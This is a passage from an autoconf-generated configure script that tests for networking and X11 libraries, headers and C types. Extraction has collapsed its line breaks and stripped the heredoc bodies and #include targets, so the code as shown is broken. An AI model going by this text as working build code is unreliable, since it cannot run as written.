eval "test \"`echo '$ac_cv_lib_'$ac_lib_var`\" = yes"; then echo "$ac_t""yes" 1>&6 X_EXTRA_LIBS="$X_EXTRA_LIBS -ldnet" else echo "$ac_t""no" 1>&6 fi if test $ac_cv_lib_dnet_dnet_ntoa = no; then echo $ac_n "checking for dnet_ntoa in -ldnet_stub""... $ac_c" 1>&6 echo "configure:1320: checking for dnet_ntoa in -ldnet_stub" >&5 ac_lib_var=`echo dnet_stub'_'dnet_ntoa | sed 'y%./+-%__p_%'` if eval "test \"`echo '$''{'ac_cv_lib_$ac_lib_var'+set}'`\" = set"; then echo $ac_n "(cached) $ac_c" 1>&6 else ac_save_LIBS="$LIBS" LIBS="-ldnet_stub $LIBS" cat > conftest.$ac_ext <&5; (eval $ac_link) 2>&5; } && test -s conftest${ac_exeext}; then rm -rf conftest* eval "ac_cv_lib_$ac_lib_var=yes" else echo "configure: failed program was:" >&5 cat conftest.$ac_ext >&5 rm -rf conftest* eval "ac_cv_lib_$ac_lib_var=no" fi rm -f conftest* LIBS="$ac_save_LIBS" fi if eval "test \"`echo '$ac_cv_lib_'$ac_lib_var`\" = yes"; then echo "$ac_t""yes" 1>&6 X_EXTRA_LIBS="$X_EXTRA_LIBS -ldnet_stub" else echo "$ac_t""no" 1>&6 fi fi # msh@cis.ufl.edu says -lnsl (and -lsocket) are needed for his 386/AT, # to get the SysV transport functions. # chad@anasazi.com says the Pyramis MIS-ES running DC/OSx (SVR4) # needs -lnsl. # The nsl library prevents programs from opening the X display # on Irix 5.2, according to dickey@clark.net. echo $ac_n "checking for gethostbyname""... $ac_c" 1>&6 echo "configure:1368: checking for gethostbyname" >&5 if eval "test \"`echo '$''{'ac_cv_func_gethostbyname'+set}'`\" = set"; then echo $ac_n "(cached) $ac_c" 1>&6 else cat > conftest.$ac_ext < /* Override any gcc2 internal prototype to avoid an error. */ /* We use char because int might match the return type of a gcc2 builtin and then its argument prototype would still apply. */ char gethostbyname(); int main() { /* The GNU C library defines this for functions which it implements to always fail with ENOSYS. Some functions are actually named something starting with __ and the normal name is an alias. */ #if defined (__stub_gethostbyname) || defined (__stub___gethostbyname) choke me #else gethostbyname(); #endif ; return 0; } EOF if { (eval echo configure:1396: \"$ac_link\") 1>&5; (eval $ac_link) 2>&5; } && test -s conftest${ac_exeext}; then rm -rf conftest* eval "ac_cv_func_gethostbyname=yes" else echo "configure: failed program was:" >&5 cat conftest.$ac_ext >&5 rm -rf conftest* eval "ac_cv_func_gethostbyname=no" fi rm -f conftest* fi if eval "test \"`echo '$ac_cv_func_'gethostbyname`\" = yes"; then echo "$ac_t""yes" 1>&6 : else echo "$ac_t""no" 1>&6 fi if test $ac_cv_func_gethostbyname = no; then echo $ac_n "checking for gethostbyname in -lnsl""... $ac_c" 1>&6 echo "configure:1417: checking for gethostbyname in -lnsl" >&5 ac_lib_var=`echo nsl'_'gethostbyname | sed 'y%./+-%__p_%'` if eval "test \"`echo '$''{'ac_cv_lib_$ac_lib_var'+set}'`\" = set"; then echo $ac_n "(cached) $ac_c" 1>&6 else ac_save_LIBS="$LIBS" LIBS="-lnsl $LIBS" cat > conftest.$ac_ext <&5; (eval $ac_link) 2>&5; } && test -s conftest${ac_exeext}; then rm -rf conftest* eval "ac_cv_lib_$ac_lib_var=yes" else echo "configure: failed program was:" >&5 cat conftest.$ac_ext >&5 rm -rf conftest* eval "ac_cv_lib_$ac_lib_var=no" fi rm -f conftest* LIBS="$ac_save_LIBS" fi if eval "test \"`echo '$ac_cv_lib_'$ac_lib_var`\" = yes"; then echo "$ac_t""yes" 1>&6 X_EXTRA_LIBS="$X_EXTRA_LIBS -lnsl" else echo "$ac_t""no" 1>&6 fi fi # lieder@skyler.mavd.honeywell.com says without -lsocket, # socket/setsockopt and other routines are undefined under SCO ODT # 2.0. But -lsocket is broken on IRIX 5.2 (and is not necessary # on later versions), says simon@lia.di.epfl.ch: it contains # gethostby* variants that don't use the nameserver (or something). # -lsocket must be given before -lnsl if both are needed. # We assume that if connect needs -lnsl, so does gethostbyname. echo $ac_n "checking for connect""... $ac_c" 1>&6 echo "configure:1466: checking for connect" >&5 if eval "test \"`echo '$''{'ac_cv_func_connect'+set}'`\" = set"; then echo $ac_n "(cached) $ac_c" 1>&6 else cat > conftest.$ac_ext < /* Override any gcc2 internal prototype to avoid an error. */ /* We use char because int might match the return type of a gcc2 builtin and then its argument prototype would still apply. */ char connect(); int main() { /* The GNU C library defines this for functions which it implements to always fail with ENOSYS. Some functions are actually named something starting with __ and the normal name is an alias. */ #if defined (__stub_connect) || defined (__stub___connect) choke me #else connect(); #endif ; return 0; } EOF if { (eval echo configure:1494: \"$ac_link\") 1>&5; (eval $ac_link) 2>&5; } && test -s conftest${ac_exeext}; then rm -rf conftest* eval "ac_cv_func_connect=yes" else echo "configure: failed program was:" >&5 cat conftest.$ac_ext >&5 rm -rf conftest* eval "ac_cv_func_connect=no" fi rm -f conftest* fi if eval "test \"`echo '$ac_cv_func_'connect`\" = yes"; then echo "$ac_t""yes" 1>&6 : else echo "$ac_t""no" 1>&6 fi if test $ac_cv_func_connect = no; then echo $ac_n "checking for connect in -lsocket""... $ac_c" 1>&6 echo "configure:1515: checking for connect in -lsocket" >&5 ac_lib_var=`echo socket'_'connect | sed 'y%./+-%__p_%'` if eval "test \"`echo '$''{'ac_cv_lib_$ac_lib_var'+set}'`\" = set"; then echo $ac_n "(cached) $ac_c" 1>&6 else ac_save_LIBS="$LIBS" LIBS="-lsocket $X_EXTRA_LIBS $LIBS" cat > conftest.$ac_ext <&5; (eval $ac_link) 2>&5; } && test -s conftest${ac_exeext}; then rm -rf conftest* eval "ac_cv_lib_$ac_lib_var=yes" else echo "configure: failed program was:" >&5 cat conftest.$ac_ext >&5 rm -rf conftest* eval "ac_cv_lib_$ac_lib_var=no" fi rm -f conftest* LIBS="$ac_save_LIBS" fi if eval "test \"`echo '$ac_cv_lib_'$ac_lib_var`\" = yes"; then echo "$ac_t""yes" 1>&6 X_EXTRA_LIBS="-lsocket $X_EXTRA_LIBS" else echo "$ac_t""no" 1>&6 fi fi # gomez@mi.uni-erlangen.de says -lposix is necessary on A/UX. echo $ac_n "checking for remove""... $ac_c" 1>&6 echo "configure:1558: checking for remove" >&5 if eval "test \"`echo '$''{'ac_cv_func_remove'+set}'`\" = set"; then echo $ac_n "(cached) $ac_c" 1>&6 else cat > conftest.$ac_ext < /* Override any gcc2 internal prototype to avoid an error. */ /* We use char because int might match the return type of a gcc2 builtin and then its argument prototype would still apply. */ char remove(); int main() { /* The GNU C library defines this for functions which it implements to always fail with ENOSYS. Some functions are actually named something starting with __ and the normal name is an alias. */ #if defined (__stub_remove) || defined (__stub___remove) choke me #else remove(); #endif ; return 0; } EOF if { (eval echo configure:1586: \"$ac_link\") 1>&5; (eval $ac_link) 2>&5; } && test -s conftest${ac_exeext}; then rm -rf conftest* eval "ac_cv_func_remove=yes" else echo "configure: failed program was:" >&5 cat conftest.$ac_ext >&5 rm -rf conftest* eval "ac_cv_func_remove=no" fi rm -f conftest* fi if eval "test \"`echo '$ac_cv_func_'remove`\" = yes"; then echo "$ac_t""yes" 1>&6 : else echo "$ac_t""no" 1>&6 fi if test $ac_cv_func_remove = no; then echo $ac_n "checking for remove in -lposix""... $ac_c" 1>&6 echo "configure:1607: checking for remove in -lposix" >&5 ac_lib_var=`echo posix'_'remove | sed 'y%./+-%__p_%'` if eval "test \"`echo '$''{'ac_cv_lib_$ac_lib_var'+set}'`\" = set"; then echo $ac_n "(cached) $ac_c" 1>&6 else ac_save_LIBS="$LIBS" LIBS="-lposix $LIBS" cat > conftest.$ac_ext <&5; (eval $ac_link) 2>&5; } && test -s conftest${ac_exeext}; then rm -rf conftest* eval "ac_cv_lib_$ac_lib_var=yes" else echo "configure: failed program was:" >&5 cat conftest.$ac_ext >&5 rm -rf conftest* eval "ac_cv_lib_$ac_lib_var=no" fi rm -f conftest* LIBS="$ac_save_LIBS" fi if eval "test \"`echo '$ac_cv_lib_'$ac_lib_var`\" = yes"; then echo "$ac_t""yes" 1>&6 X_EXTRA_LIBS="$X_EXTRA_LIBS -lposix" else echo "$ac_t""no" 1>&6 fi fi # BSDI BSD/OS 2.1 needs -lipc for XOpenDisplay. echo $ac_n "checking for shmat""... $ac_c" 1>&6 echo "configure:1650: checking for shmat" >&5 if eval "test \"`echo '$''{'ac_cv_func_shmat'+set}'`\" = set"; then echo $ac_n "(cached) $ac_c" 1>&6 else cat > conftest.$ac_ext < /* Override any gcc2 internal prototype to avoid an error. */ /* We use char because int might match the return type of a gcc2 builtin and then its argument prototype would still apply. */ char shmat(); int main() { /* The GNU C library defines this for functions which it implements to always fail with ENOSYS. Some functions are actually named something starting with __ and the normal name is an alias. */ #if defined (__stub_shmat) || defined (__stub___shmat) choke me #else shmat(); #endif ; return 0; } EOF if { (eval echo configure:1678: \"$ac_link\") 1>&5; (eval $ac_link) 2>&5; } && test -s conftest${ac_exeext}; then rm -rf conftest* eval "ac_cv_func_shmat=yes" else echo "configure: failed program was:" >&5 cat conftest.$ac_ext >&5 rm -rf conftest* eval "ac_cv_func_shmat=no" fi rm -f conftest* fi if eval "test \"`echo '$ac_cv_func_'shmat`\" = yes"; then echo "$ac_t""yes" 1>&6 : else echo "$ac_t""no" 1>&6 fi if test $ac_cv_func_shmat = no; then echo $ac_n "checking for shmat in -lipc""... $ac_c" 1>&6 echo "configure:1699: checking for shmat in -lipc" >&5 ac_lib_var=`echo ipc'_'shmat | sed 'y%./+-%__p_%'` if eval "test \"`echo '$''{'ac_cv_lib_$ac_lib_var'+set}'`\" = set"; then echo $ac_n "(cached) $ac_c" 1>&6 else ac_save_LIBS="$LIBS" LIBS="-lipc $LIBS" cat > conftest.$ac_ext <&5; (eval $ac_link) 2>&5; } && test -s conftest${ac_exeext}; then rm -rf conftest* eval "ac_cv_lib_$ac_lib_var=yes" else echo "configure: failed program was:" >&5 cat conftest.$ac_ext >&5 rm -rf conftest* eval "ac_cv_lib_$ac_lib_var=no" fi rm -f conftest* LIBS="$ac_save_LIBS" fi if eval "test \"`echo '$ac_cv_lib_'$ac_lib_var`\" = yes"; then echo "$ac_t""yes" 1>&6 X_EXTRA_LIBS="$X_EXTRA_LIBS -lipc" else echo "$ac_t""no" 1>&6 fi fi fi # Check for libraries that X11R6 Xt/Xaw programs need. ac_save_LDFLAGS="$LDFLAGS" test -n "$x_libraries" && LDFLAGS="$LDFLAGS -L$x_libraries" # SM needs ICE to (dynamically) link under SunOS 4.x (so we have to # check for ICE first), but we must link in the order -lSM -lICE or # we get undefined symbols. So assume we have SM if we have ICE. # These have to be linked with before -lX11, unlike the other # libraries we check for below, so use a different variable. # --interran@uluru.Stanford.EDU, kb@cs.umb.edu. echo $ac_n "checking for IceConnectionNumber in -lICE""... $ac_c" 1>&6 echo "configure:1751: checking for IceConnectionNumber in -lICE" >&5 ac_lib_var=`echo ICE'_'IceConnectionNumber | sed 'y%./+-%__p_%'` if eval "test \"`echo '$''{'ac_cv_lib_$ac_lib_var'+set}'`\" = set"; then echo $ac_n "(cached) $ac_c" 1>&6 else ac_save_LIBS="$LIBS" LIBS="-lICE $X_EXTRA_LIBS $LIBS" cat > conftest.$ac_ext <&5; (eval $ac_link) 2>&5; } && test -s conftest${ac_exeext}; then rm -rf conftest* eval "ac_cv_lib_$ac_lib_var=yes" else echo "configure: failed program was:" >&5 cat conftest.$ac_ext >&5 rm -rf conftest* eval "ac_cv_lib_$ac_lib_var=no" fi rm -f conftest* LIBS="$ac_save_LIBS" fi if eval "test \"`echo '$ac_cv_lib_'$ac_lib_var`\" = yes"; then echo "$ac_t""yes" 1>&6 X_PRE_LIBS="$X_PRE_LIBS -lSM -lICE" else echo "$ac_t""no" 1>&6 fi LDFLAGS="$ac_save_LDFLAGS" fi echo $ac_n "checking for ANSI C header files""... $ac_c" 1>&6 echo "configure:1795: checking for ANSI C header files" >&5 if eval "test \"`echo '$''{'ac_cv_header_stdc'+set}'`\" = set"; then echo $ac_n "(cached) $ac_c" 1>&6 else cat > conftest.$ac_ext < #include #include #include EOF ac_try="$ac_cpp conftest.$ac_ext >/dev/null 2>conftest.out" { (eval echo configure:1808: \"$ac_try\") 1>&5; (eval $ac_try) 2>&5; } ac_err=`grep -v '^ *+' conftest.out | grep -v "^conftest.${ac_ext}\$"` if test -z "$ac_err"; then rm -rf conftest* ac_cv_header_stdc=yes else echo "$ac_err" >&5 echo "configure: failed program was:" >&5 cat conftest.$ac_ext >&5 rm -rf conftest* ac_cv_header_stdc=no fi rm -f conftest* if test $ac_cv_header_stdc = yes; then # SunOS 4.x string.h does not declare mem*, contrary to ANSI. cat > conftest.$ac_ext < EOF if (eval "$ac_cpp conftest.$ac_ext") 2>&5 | egrep "memchr" >/dev/null 2>&1; then : else rm -rf conftest* ac_cv_header_stdc=no fi rm -f conftest* fi if test $ac_cv_header_stdc = yes; then # ISC 2.0.2 stdlib.h does not declare free, contrary to ANSI. cat > conftest.$ac_ext < EOF if (eval "$ac_cpp conftest.$ac_ext") 2>&5 | egrep "free" >/dev/null 2>&1; then : else rm -rf conftest* ac_cv_header_stdc=no fi rm -f conftest* fi if test $ac_cv_header_stdc = yes; then # /bin/cc in Irix-4.0.5 gets non-ANSI ctype macros unless using -ansi. if test "$cross_compiling" = yes; then : else cat > conftest.$ac_ext < #define ISLOWER(c) ('a' <= (c) && (c) <= 'z') #define TOUPPER(c) (ISLOWER(c) ? 'A' + ((c) - 'a') : (c)) #define XOR(e, f) (((e) && !(f)) || (!(e) && (f))) int main () { int i; for (i = 0; i < 256; i++) if (XOR (islower (i), ISLOWER (i)) || toupper (i) != TOUPPER (i)) exit(2); exit (0); } EOF if { (eval echo configure:1875: \"$ac_link\") 1>&5; (eval $ac_link) 2>&5; } && test -s conftest${ac_exeext} && (./conftest; exit) 2>/dev/null then : else echo "configure: failed program was:" >&5 cat conftest.$ac_ext >&5 rm -fr conftest* ac_cv_header_stdc=no fi rm -fr conftest* fi fi fi echo "$ac_t""$ac_cv_header_stdc" 1>&6 if test $ac_cv_header_stdc = yes; then cat >> confdefs.h <<\EOF #define STDC_HEADERS 1 EOF fi for ac_hdr in err.h fcntl.h sys/ioctl.h sys/queue.h unistd.h libgen.h net/if_tun.h do ac_safe=`echo "$ac_hdr" | sed 'y%./+-%__p_%'` echo $ac_n "checking for $ac_hdr""... $ac_c" 1>&6 echo "configure:1902: checking for $ac_hdr" >&5 if eval "test \"`echo '$''{'ac_cv_header_$ac_safe'+set}'`\" = set"; then echo $ac_n "(cached) $ac_c" 1>&6 else cat > conftest.$ac_ext < EOF ac_try="$ac_cpp conftest.$ac_ext >/dev/null 2>conftest.out" { (eval echo configure:1912: \"$ac_try\") 1>&5; (eval $ac_try) 2>&5; } ac_err=`grep -v '^ *+' conftest.out | grep -v "^conftest.${ac_ext}\$"` if test -z "$ac_err"; then rm -rf conftest* eval "ac_cv_header_$ac_safe=yes" else echo "$ac_err" >&5 echo "configure: failed program was:" >&5 cat conftest.$ac_ext >&5 rm -rf conftest* eval "ac_cv_header_$ac_safe=no" fi rm -f conftest* fi if eval "test \"`echo '$ac_cv_header_'$ac_safe`\" = yes"; then echo "$ac_t""yes" 1>&6 ac_tr_hdr=HAVE_`echo $ac_hdr | sed 'y%abcdefghijklmnopqrstuvwxyz./-%ABCDEFGHIJKLMNOPQRSTUVWXYZ___%'` cat >> confdefs.h <&6 fi done echo $ac_n "checking for MIN and MAX in sys/param.h""... $ac_c" 1>&6 echo "configure:1939: checking for MIN and MAX in sys/param.h" >&5 cat > conftest.$ac_ext < #if defined(MAX) && defined(MIN) yes #endif EOF if (eval "$ac_cpp conftest.$ac_ext") 2>&5 | egrep "yes" >/dev/null 2>&1; then rm -rf conftest* echo "$ac_t""yes" 1>&6; cat >> confdefs.h <<\EOF #define HAVE_MINMAX 1 EOF else rm -rf conftest* echo "$ac_t""no" 1>&6 fi rm -f conftest* echo $ac_n "checking for working const""... $ac_c" 1>&6 echo "configure:1966: checking for working const" >&5 if eval "test \"`echo '$''{'ac_cv_c_const'+set}'`\" = set"; then echo $ac_n "(cached) $ac_c" 1>&6 else cat > conftest.$ac_ext <j = 5; } { /* ULTRIX-32 V3.1 (Rev 9) vcc rejects this */ const int foo = 10; } ; return 0; } EOF if { (eval echo configure:2020: \"$ac_compile\") 1>&5; (eval $ac_compile) 2>&5; }; then rm -rf conftest* ac_cv_c_const=yes else echo "configure: failed program was:" >&5 cat conftest.$ac_ext >&5 rm -rf conftest* ac_cv_c_const=no fi rm -f conftest* fi echo "$ac_t""$ac_cv_c_const" 1>&6 if test $ac_cv_c_const = no; then cat >> confdefs.h <<\EOF #define const EOF fi echo $ac_n "checking for size_t""... $ac_c" 1>&6 echo "configure:2041: checking for size_t" >&5 if eval "test \"`echo '$''{'ac_cv_type_size_t'+set}'`\" = set"; then echo $ac_n "(cached) $ac_c" 1>&6 else cat > conftest.$ac_ext < #if STDC_HEADERS #include #include #endif EOF if (eval "$ac_cpp conftest.$ac_ext") 2>&5 | egrep "(^|[^a-zA-Z_0-9])size_t[^a-zA-Z_0-9]" >/dev/null 2>&1; then rm -rf conftest* ac_cv_type_size_t=yes else rm -rf conftest* ac_cv_type_size_t=no fi rm -f conftest* fi echo "$ac_t""$ac_cv_type_size_t" 1>&6 if test $ac_cv_type_size_t = no; then cat >> confdefs.h <<\EOF #define size_t unsigned EOF fi echo $ac_n "checking whether struct tm is in sys/time.h or time.h""... $ac_c" 1>&6 echo "configure:2074: checking whether struct tm is in sys/time.h or time.h" >&5 if eval "test \"`echo '$''{'ac_cv_struct_tm'+set}'`\" = set"; then echo $ac_n "(cached) $ac_c" 1>&6 else cat > conftest.$ac_ext < #include int main() { struct tm *tp; tp->tm_sec; ; return 0; } EOF if { (eval echo configure:2087: \"$ac_compile\") 1>&5; (eval $ac_compile) 2>&5; }; then rm -rf conftest* ac_cv_struct_tm=time.h else echo "configure: failed program was:" >&5 cat conftest.$ac_ext >&5 rm -rf conftest* ac_cv_struct_tm=sys/time.h fi rm -f conftest* fi echo "$ac_t""$ac_cv_struct_tm" 1>&6 if test $ac_cv_struct_tm = sys/time.h; then cat >> confdefs.h <<\EOF #define TM_IN_SYS_TIME 1 EOF fi echo $ac_n "checking for u_int32_t""... $ac_c" 1>&6 echo "configure:2108: checking for u_int32_t" >&5 if eval "test \"`echo '$''{'ac_cv_type_u_int32_t'+set}'`\" = set"; then echo $ac_n "(cached) $ac_c" 1>&6 else cat > conftest.$ac_ext < #if STDC_HEADERS #include #include #endif EOF if (eval "$ac_cpp conftest.$ac_ext") 2>&5 | egrep "(^|[^a-zA-Z_0-9])u_int32_t[^a-zA-Z_0-9]" >/dev/null 2>&1; then rm -rf conftest* ac_cv_type_u_int32_t=yes else rm -rf conftest* ac_cv_type_u_int32_t=no fi rm -f conftest* fi echo "$ac_t""$ac_cv_type_u_int32_t" 1>&6 if test $ac_cv_type_u_int32_t = no; then cat >> confdefs.h <<\EOF #define u_int32_t uint32_t EOF fi echo $ac_n "checking for u_int64_t""... $ac_c" 1>&6 echo "configure:2141: checking for u_int64_t" >&5 if eval "test \"`echo '$''{'ac_cv_type_u_int64_t'+set}'`\" = set"; then echo $ac_n "(cached) $ac_c" 1>&6 else cat > conftest.$ac_ext < #if STDC_HEADERS #include #include #endif EOF if (eval "$ac_cpp conftest.$ac_ext") 2>&5 | egrep "(^|[^a-zA-Z_0-9])u_int64_t[^a-zA-Z_0-9]" >/dev/null 2>&1; then rm -rf conftest* ac_cv_type_u_int64_t=yes else rm -rf conftest* ac_cv_type_u_int64_t=no fi rm -f conftest* fi echo "$ac_t""$ac_cv_type_u_int64_t" 1>&6 if test $ac_cv_type_u_int64_t = no; then cat >> confdefs.h <<\EOF #define u_int64_t uint64_t EOF fi echo $ac_n "checking for in_addr_t""... $ac_c" 1>&6 echo "configure:2174: checking for in_addr_t" >&5 if eval "test \"`echo '$''{'ac_cv_type_in_addr_t'+set}'`\" = set"; then echo $ac_n "(cached) $ac_c" 1>&6 else cat > conftest.$ac_ext < #if STDC_HEADERS #include #include #endif EOF if (eval "$ac_cpp conftest.$ac_ext") 2>&5 | egrep "(^|[^a-zA-Z_0-9])in_addr_t[^a-zA-Z_0-9]" >/dev/null 2>&1; then rm -rf conftest* ac_cv_type_in_addr_t=yes else rm -rf conftest* ac_cv_type_in_addr_t=no fi rm -f conftest* fi echo "$ac_t""$ac_cv_type_in_addr_t" 1>&6 if test $ac_cv_type_in_addr_t = no; then cat >> confdefs.h <<\EOF #define in_addr_t u_int32_t EOF fi CFLAGS="$CFLAGS -D_BSD_SOURCE" if test $ac_cv_prog_gcc = yes; then echo $ac_n "checking whether ${CC-cc} needs -traditional""... $ac_c" 1>&6 echo "configure:2210: checking whether ${CC-cc} needs -traditional" >&5 if eval "test \"`echo '$''{'ac_cv_prog_gcc_traditional'+set}'`\" = set"; then echo $ac_n "(cached) $ac_c" 1>&6 else ac_pattern="Autoconf.*'x'" cat > conftest.$ac_ext < Autoconf TIOCGETP EOF if (eval "$ac_cpp conftest.$ac_ext") 2>&5 | egrep "$ac_pattern" >/dev/null 2>&1; then rm -rf conftest* ac_cv_prog_gcc_traditional=yes else rm -rf conftest* ac_cv_prog_gcc_traditional=no fi rm -f conftest* if test $ac_cv_prog_gcc_traditional = no; then cat > conftest.$ac_ext < Autoconf TCGETA EOF if (eval "$ac_cpp conftest.$ac_ext") 2>&5 | egrep "$ac_pattern" >/dev/null 2>&1; then rm -rf conftest* ac_cv_prog_gcc_traditional=yes fi rm -f conftest* fi fi echo "$ac_t""$ac_cv_prog_gcc_traditional" 1>&6 if test $ac_cv_prog_gcc_traditional = yes; then CC="$CC -traditional" fi fi echo $ac_n "checking for 8-bit clean memcmp""... $ac_c" 1>&6 echo "configure:2256: checking for 8-bit clean memcmp" >&5 if eval "test \"`echo '$''{'ac_cv_func_memcmp_clean'+set}'`\" = set"; then echo $ac_n "(cached) $ac_c" 1>&6 else if test "$cross_compiling" = yes; then ac_cv_func_memcmp_clean=no else cat > conftest.$ac_ext <&5; (eval $ac_link) 2>&5; } && test -s conftest${ac_exeext} && (./conftest; exit) 2>/dev/null then ac_cv_func_memcmp_clean=yes else echo "configure: failed program was:" >&5 cat conftest.$ac_ext >&5 rm -fr conftest* ac_cv_func_memcmp_clean=no fi rm -fr conftest* fi fi echo "$ac_t""$ac_cv_func_memcmp_clean" 1>&6 test $ac_cv_func_memcmp_clean = no && LIBOBJS="$LIBOBJS memcmp.${ac_objext}" echo $ac_n "checking return type of signal handlers""... $ac_c" 1>&6 echo "configure:2292: checking return type of signal handlers" >&5 if eval "test \"`echo '$''{'ac_cv_type_signal'+set}'`\" = set"; then echo $ac_n "(cached) $ac_c" 1>&6 else cat > conftest.$ac_ext < #include #ifdef signal #undef signal #endif #ifdef __cplusplus extern "C" void (*signal (int, void (*)(int)))(int); #else void (*signal ()) (); #endif int main() { int i; ; return 0; } EOF if { (eval echo configure:2314: \"$ac_compile\") 1>&5; (eval $ac_compile) 2>&5; }; then rm -rf conftest* ac_cv_type_signal=void else echo "configure: failed program was:" >&5 cat conftest.$ac_ext >&5 rm -rf conftest* ac_cv_type_signal=int fi rm -f conftest* fi echo "$ac_t""$ac_cv_type_signal" 1>&6 cat >> confdefs.h <&6 echo "configure:2333: checking for strftime" >&5 if eval "test \"`echo '$''{'ac_cv_func_strftime'+set}'`\" = set"; then echo $ac_n "(cached) $ac_c" 1>&6 else cat > conftest.$ac_ext < /* Override any gcc2 internal prototype to avoid an error. */ /* We use char because int might match the return type of a gcc2 builtin and then its argument prototype would still apply. */ char strftime(); int main() { /* The GNU C library defines this for functions which it implements to always fail with ENOSYS. Some functions are actually named something starting with __ and the normal name is an alias. */ #if defined (__stub_strftime) || defined (__stub___strftime) choke me #else strftime(); #endif ; return 0; } EOF if { (eval echo configure:2361: \"$ac_link\") 1>&5; (eval $ac_link) 2>&5; } && test -s conftest${ac_exeext}; then rm -rf conftest* eval "ac_cv_func_strftime=yes" else echo "configure: failed program was:" >&5 cat conftest.$ac_ext >&5 rm -rf conftest* eval "ac_cv_func_strftime=no" fi rm -f conftest* fi if eval "test \"`echo '$ac_cv_func_'strftime`\" = yes"; then echo "$ac_t""yes" 1>&6 cat >> confdefs.h <<\EOF #define HAVE_STRFTIME 1 EOF else echo "$ac_t""no" 1>&6 # strftime is in -lintl on SCO UNIX. echo $ac_n "checking for strftime in -lintl""... $ac_c" 1>&6 echo "configure:2383: checking for strftime in -lintl" >&5 ac_lib_var=`echo intl'_'strftime | sed 'y%./+-%__p_%'` if eval "test \"`echo '$''{'ac_cv_lib_$ac_lib_var'+set}'`\" = set"; then echo $ac_n "(cached) $ac_c" 1>&6 else ac_save_LIBS="$LIBS" LIBS="-lintl $LIBS" cat > conftest.$ac_ext <&5; (eval $ac_link) 2>&5; } && test -s conftest${ac_exeext}; then rm -rf conftest* eval "ac_cv_lib_$ac_lib_var=yes" else echo "configure: failed program was:" >&5 cat conftest.$ac_ext >&5 rm -rf conftest* eval "ac_cv_lib_$ac_lib_var=no" fi rm -f conftest* LIBS="$ac_save_LIBS" fi if eval "test \"`echo '$ac_cv_lib_'$ac_lib_var`\" = yes"; then echo "$ac_t""yes" 1>&6 cat >> confdefs.h <<\EOF #define HAVE_STRFTIME 1 EOF LIBS="-lintl $LIBS" else echo "$ac_t""no" 1>&6 fi fi for ac_func in gethostname socket strdup strstr do echo $ac_n "checking for $ac_func""... $ac_c" 1>&6 echo "configure:2431: checking for $ac_func" >&5 if eval "test \"`echo '$''{'ac_cv_func_$ac_func'+set}'`\" = set"; then echo $ac_n "(cached) $ac_c" 1>&6 else cat > conftest.$ac_ext < /* Override any gcc2 internal prototype to avoid an error. */ /* We use char because int might match the return type of a gcc2 builtin and then its argument prototype would still apply. */ char $ac_func(); int main() { /* The GNU C library defines this for functions which it implements to always fail with ENOSYS. Some functions are actually named something starting with __ and the normal name is an alias. */ #if defined (__stub_$ac_func) || defined (__stub___$ac_func) choke me #else $ac_func(); #endif ; return 0; } EOF if { (eval echo configure:2459: \"$ac_link\") 1>&5; (eval $ac_link) 2>&5; } && test -s conftest${ac_exeext}; then rm -rf conftest* eval "ac_cv_func_$ac_func=yes" else echo "configure: failed program was:" >&5 cat conftest.$ac_ext >&5 rm -rf conftest* eval "ac_cv_func_$ac_func=no" fi rm -f conftest* fi if eval "test \"`echo '$ac_cv_func_'$ac_func`\" = yes"; then echo "$ac_t""yes" 1>&6 ac_tr_func=HAVE_`echo $ac_func | tr 'abcdefghijklmnopqrstuvwxyz' 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'` cat >> confdefs.h <&6 fi done echo $ac_n "checking for xdr_fhstatus in -lrpcsvc""... $ac_c" 1>&6 echo "configure:2484: checking for xdr_fhstatus in -lrpcsvc" >&5 ac_lib_var=`echo rpcsvc'_'xdr_fhstatus | sed 'y%./+-%__p_%'` if eval "test \"`echo '$''{'ac_cv_lib_$ac_lib_var'+set}'`\" = set"; then echo $ac_n "(cached) $ac_c" 1>&6 else ac_save_LIBS="$LIBS" LIBS="-lrpcsvc $LIBS" cat > conftest.$ac_ext <&5; (eval $ac_link) 2>&5; } && test -s conftest${ac_exeext}; then rm -rf conftest* eval "ac_cv_lib_$ac_lib_var=yes" else echo "configure: failed program was:" >&5 cat conftest.$ac_ext >&5 rm -rf conftest* eval "ac_cv_lib_$ac_lib_var=no" fi rm -f conftest* LIBS="$ac_save_LIBS" fi if eval "test \"`echo '$ac_cv_lib_'$ac_lib_var`\" = yes"; then echo "$ac_t""yes" 1>&6 ac_tr_lib=HAVE_LIB`echo rpcsvc | sed -e 's/[^a-zA-Z0-9_]/_/g' \ -e 'y/abcdefghijklmnopqrstuvwxyz/ABCDEFGHIJKLMNOPQRSTUVWXYZ/'` cat >> confdefs.h <&6 fi echo $ac_n "checking for socket in -lsocket""... $ac_c" 1>&6 echo "configure:2531: checking for socket in -lsocket" >&5 ac_lib_var=`echo socket'_'socket | sed 'y%./+-%__p_%'` if eval "test \"`echo '$''{'ac_cv_lib_$ac_lib_var'+set}'`\" = set"; then echo $ac_n "(cached) $ac_c" 1>&6 else ac_save_LIBS="$LIBS" LIBS="-lsocket $LIBS" cat > conftest.$ac_ext <&5; (eval $ac_link) 2>&5; } && test -s conftest${ac_exeext}; then rm -rf conftest* eval "ac_cv_lib_$ac_lib_var=yes" else echo "configure: failed program was:" >&5 cat conftest.$ac_ext >&5 rm -rf conftest* eval "ac_cv_lib_$ac_lib_var=no" fi rm -f conftest* LIBS="$ac_save_LIBS" fi if eval "test \"`echo '$ac_cv_lib_'$ac_lib_var`\" = yes"; then echo "$ac_t""yes" 1>&6 ac_tr_lib=HAVE_LIB`echo socket | sed -e 's/[^a-zA-Z0-9_]/_/g' \ -e 'y/abcdefghijklmnopqrstuvwxyz/ABCDEFGHIJKLMNOPQRSTUVWXYZ/'` cat >> confdefs.h <&6 fi echo $ac_n "checking for gethostbyname in -lnsl""... $ac_c" 1>&6 echo "configure:2578: checking for gethostbyname in -lnsl" >&5 ac_lib_var=`echo nsl'_'gethostbyname | sed 'y%./+-%__p_%'` if eval "test \"`echo '$''{'ac_cv_lib_$ac_lib_var'+set}'`\" = set"; then echo $ac_n "(cached) $ac_c" 1>&6 else ac_save_LIBS="$LIBS" LIBS="-lnsl $LIBS" cat > conftest.$ac_ext <&5; (eval $ac_link) 2>&5; } && test -s conftest${ac_exeext}; then rm -rf conftest* eval "ac_cv_lib_$ac_lib_var=yes" else echo "configure: failed program was:" >&5 cat conftest.$ac_ext >&5 rm -rf conftest* eval "ac_cv_lib_$ac_lib_var=no" fi rm -f conftest* LIBS="$ac_save_LIBS" fi if eval "test \"`echo '$ac_cv_lib_'$ac_lib_var`\" = 